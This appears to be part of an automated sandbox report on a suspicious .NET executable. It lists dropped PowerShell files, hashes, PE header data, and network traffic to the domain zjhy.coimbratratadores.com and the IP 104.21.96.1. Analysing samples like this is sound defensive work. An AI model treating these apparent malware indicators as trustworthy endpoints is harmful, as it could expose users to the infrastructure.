                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Cul

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4yurev3y.qll.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeyop1fs.kdc.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxwdlem1.d0c.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jwmkrkr2.j2q.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbdqnqno.qde.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yujlf51u.d3k.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3YOYOCVQE413P5UWNVDA.temp

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7217635673850795
                                  Encrypted:false
                                  SSDEEP:48:ZfYCfZCl3CvU2UZVjwukvhkvklCywflYF/lxASogZopFFYF/l+ASogZoP1:e2CNCsNZVdkvhkvCCtNYF/FHaYF/IHM
                                  MD5:23A7C986ECB8359A1D1216844819DD85
                                  SHA1:BA3C8C05A49B96917BBB2FEFF4C18AE5DAB5F996
                                  SHA-256:1B67986CEB46AEB00315440C1E6FA64B10243FAF3AB34666C0C0D7449D521EEC
                                  SHA-512:886E108157BB7F944F682513779657132D5C7154AB2514244C422640D6E1CD30C46AADA01B4B4E3D66CA41D639FC79FB1333EB05B0E74A0E7DAE179992ED20E9
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...]...z...:....c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z........c..&.%..c......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V*Z............................B...A.p.p.D.a.t.a...B.V.1.....*Z....Roaming.@......EW.V*Z............................Iy?.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V*Z................................M.i.c.r.o.s.o.f.t.....V.1.....EW&Y..Windows.@......EW.V*Z................................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V*Z......................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V*Z......................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V*Z..................

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7217635673850795
                                  Encrypted:false
                                  SSDEEP:48:ZfYCfZCl3CvU2UZVjwukvhkvklCywflYF/lxASogZopFFYF/l+ASogZoP1:e2CNCsNZVdkvhkvCCtNYF/FHaYF/IHM
                                  MD5:23A7C986ECB8359A1D1216844819DD85
                                  SHA1:BA3C8C05A49B96917BBB2FEFF4C18AE5DAB5F996
                                  SHA-256:1B67986CEB46AEB00315440C1E6FA64B10243FAF3AB34666C0C0D7449D521EEC
                                  SHA-512:886E108157BB7F944F682513779657132D5C7154AB2514244C422640D6E1CD30C46AADA01B4B4E3D66CA41D639FC79FB1333EB05B0E74A0E7DAE179992ED20E9
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...]...z...:....c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z........c..&.%..c......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V*Z............................B...A.p.p.D.a.t.a...B.V.1.....*Z....Roaming.@......EW.V*Z............................Iy?.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V*Z................................M.i.c.r.o.s.o.f.t.....V.1.....EW&Y..Windows.@......EW.V*Z................................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V*Z......................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V*Z......................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V*Z..................

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF3fde47.TMP (copy)

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7217635673850795
                                  Encrypted:false
                                  SSDEEP:48:ZfYCfZCl3CvU2UZVjwukvhkvklCywflYF/lxASogZopFFYF/l+ASogZoP1:e2CNCsNZVdkvhkvCCtNYF/FHaYF/IHM
                                  MD5:23A7C986ECB8359A1D1216844819DD85
                                  SHA1:BA3C8C05A49B96917BBB2FEFF4C18AE5DAB5F996
                                  SHA-256:1B67986CEB46AEB00315440C1E6FA64B10243FAF3AB34666C0C0D7449D521EEC
                                  SHA-512:886E108157BB7F944F682513779657132D5C7154AB2514244C422640D6E1CD30C46AADA01B4B4E3D66CA41D639FC79FB1333EB05B0E74A0E7DAE179992ED20E9
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...]...z...:....c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z........c..&.%..c......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V*Z............................B...A.p.p.D.a.t.a...B.V.1.....*Z....Roaming.@......EW.V*Z............................Iy?.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V*Z................................M.i.c.r.o.s.o.f.t.....V.1.....EW&Y..Windows.@......EW.V*Z................................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V*Z......................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V*Z......................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V*Z..................

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RSIWG13Z6DAWEPFWIPXX.temp

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.723576800718107
                                  Encrypted:false
                                  SSDEEP:48:ZVCfZCl3CvU2EZVjwukvhkvklCywflYF/l+ASogZopFFYF/l+ASogZoP1:H2CNCsNZVdkvhkvCCtNYF/IHaYF/IHM
                                  MD5:AF3174EEDE10F28E5C8A0F3A46C47192
                                  SHA1:9C5B4669F507C74D47C183C167936640C97101E4
                                  SHA-256:C962CA84FEB13C52394ACC1DBF93FD146BF4329467C823263553094DD0922372
                                  SHA-512:C1BFAA2E0E51CCD9E0435193DAA476A2098AD4C6E590A7CE5159DB7618ACAF9A26618D9654049DA4C2BAF199C528B1CFE95489BF240494FF4FB4754145250715
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...]...z...:....c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z........c......c......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V*Z............................B...A.p.p.D.a.t.a...B.V.1.....*Z....Roaming.@......EW.V*Z............................Iy?.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V*Z................................M.i.c.r.o.s.o.f.t.....V.1.....EW&Y..Windows.@......EW.V*Z................................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V*Z......................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V*Z......................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.V*Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V*Z..................

                                  Static File Info

                                  General

                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):4.96040409245987
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:87J30ulb4q.exe
                                  File size:23'040 bytes
                                  MD5:f60ca825aa99f293f45fd16610d64a45
                                  SHA1:2661b9d7a7801b1aa997ff3fc7c9d30aedbc4fa6
                                  SHA256:7c2c27aaedbc67a8e7e5c3e2e529d1a97c1b2778dbaeac037bfedaea51e0f867
                                  SHA512:e6d74668e7c3f339e7543011870ca125a47be062b591d0e02cf6d65fd28e649f916dd86bfce57be0fdb55095ab7e0e38aa1ca17db8e79426b606289a65bdfb25
                                  SSDEEP:384:whZ/ZDI4WoKct3XQ/fPy/I6RylDa4hArl16kyKjDWucxB+VuK:kI4R3GPZ6RylDa4hArlgkyKjDWuV3
                                  TLSH:25A2661469FE441AC27FEE30ADF5A5DDCAFA66532404A8BF08D503875B13B40DF82979
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..P...........n... ........@.. ....................................`................................

                                  File Icon

                                  Icon Hash:90cececece8e8eb0

                                  Static PE Info

                                  General

                                  Entrypoint:0x406e8e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0xDF19A82E [Tue Aug 10 18:23:42 2088 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6e3a0x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x5ac.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x6dac0x38.text
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x4e940x500069f62f86f790bc99792b5c66c4984f72False0.408349609375data5.102184080329096IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0x80000x5ac0x600f7d435cbe99dd9e40c5075da866ed8fcFalse0.41796875data4.083834761172241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xa0000xc0x20086b994bfe516ad0bc2489a5e0f94f2faFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_VERSION0x80900x31cdata0.4321608040201005
                                  RT_MANIFEST0x83bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 10, 2025 22:21:42.207220078 CET49707443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:42.207276106 CET44349707104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:42.207429886 CET49707443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:42.215361118 CET49707443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:42.215375900 CET44349707104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:42.701354980 CET44349707104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:42.701457977 CET49707443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:42.705156088 CET49707443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:42.705177069 CET44349707104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:42.705493927 CET44349707104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:42.754234076 CET49707443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:42.870836020 CET49707443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:42.911329985 CET44349707104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:43.261605978 CET44349707104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:43.261670113 CET44349707104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:43.262036085 CET49707443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:43.276186943 CET49707443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:44.499392033 CET49708443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:44.499430895 CET44349708104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:44.499537945 CET49708443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:44.504821062 CET49708443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:44.504836082 CET44349708104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:44.965205908 CET44349708104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:44.965275049 CET49708443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:44.966996908 CET49708443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:44.967003107 CET44349708104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:44.967272997 CET44349708104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:44.974056959 CET49708443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:45.019339085 CET44349708104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:45.354696989 CET44349708104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:45.354769945 CET44349708104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:45.354814053 CET49708443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:45.355371952 CET49708443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:53.086674929 CET49740443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:53.086713076 CET44349740104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:53.087140083 CET49740443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:53.096276045 CET49740443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:53.096292019 CET44349740104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:53.554637909 CET44349740104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:53.554711103 CET49740443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:53.555958986 CET49740443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:53.555963993 CET44349740104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:53.556211948 CET44349740104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:53.563035011 CET49740443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:53.603343010 CET44349740104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:53.948569059 CET44349740104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:53.948632002 CET44349740104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:21:53.948945045 CET49740443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:21:53.995851994 CET49740443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:22:00.600729942 CET49788443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:22:00.600773096 CET44349788104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:22:00.600852966 CET49788443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:22:00.603444099 CET49788443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:22:00.603456020 CET44349788104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:22:01.114072084 CET44349788104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:22:01.114137888 CET49788443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:22:01.118146896 CET49788443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:22:01.118169069 CET44349788104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:22:01.118535995 CET44349788104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:22:01.128258944 CET49788443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:22:01.171346903 CET44349788104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:22:01.525507927 CET44349788104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:22:01.525674105 CET44349788104.21.96.1192.168.2.11
                                  Jan 10, 2025 22:22:01.525929928 CET49788443192.168.2.11104.21.96.1
                                  Jan 10, 2025 22:22:01.526577950 CET49788443192.168.2.11104.21.96.1

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 10, 2025 22:21:42.186670065 CET5106053192.168.2.111.1.1.1
                                  Jan 10, 2025 22:21:42.201565981 CET53510601.1.1.1192.168.2.11

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 10, 2025 22:21:42.186670065 CET192.168.2.111.1.1.10x78e1Standard query (0)zjhy.coimbratratadores.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
